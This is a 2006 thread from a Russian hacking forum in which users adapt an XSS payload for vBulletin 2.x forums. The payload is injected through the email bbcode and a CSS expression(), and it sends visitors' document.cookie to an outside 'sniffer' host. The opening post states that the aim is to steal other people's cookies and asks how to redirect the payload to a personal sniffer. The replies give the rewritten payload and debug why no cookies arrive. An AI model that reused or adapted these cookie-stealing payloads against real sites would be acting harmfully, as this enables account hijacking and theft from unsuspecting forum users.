ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу vBulletin 2.*.* - XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin 2.*.* - XSS
  #1  
Старый 30.11.2006, 02:19
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию vBulletin 2.*.* - XSS
есть код [E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss)); помогите переделать под другой снифер или объясните что тут менять?

Вот под этот
Адрес картинки-сниффера:
http://www.snif.ru/snif/s.gif?id=102

что бы украсть чьи-то cookies, то код должен быть примерно таким:

<script>img=new Image(); img.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;</script>
 
Ответить с цитированием

  #2  
Старый 30.11.2006, 09:57
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию
хм..

Код:
[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;this.sss=null" style=top:expression(eval(this.sss));
 
Ответить с цитированием

  #3  
Старый 30.11.2006, 22:31
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию
в том то и дело что так я уже пробовал и ни че не пришло на снифер но на ачатовский приходит походу дело в снифере может кто скажет в чем может быть разница?
 
Ответить с цитированием

  #4  
Старый 30.11.2006, 22:47
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию
если мне память не изменяет то эта xss уже описывалась давно -- там стоит ограничение на строку с мылом в 60 символов --- поэтому твой скрипт обрезает
 
Ответить с цитированием

  #5  
Старый 30.11.2006, 23:33
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию
форум то скрипт нормально проглатывает, чето я не понял на ачатовский снифак же куки приходят.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
XSS vbulletin and IPB v2.1.7 With IE liauliau Форумы 6 16.08.2006 15:19
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ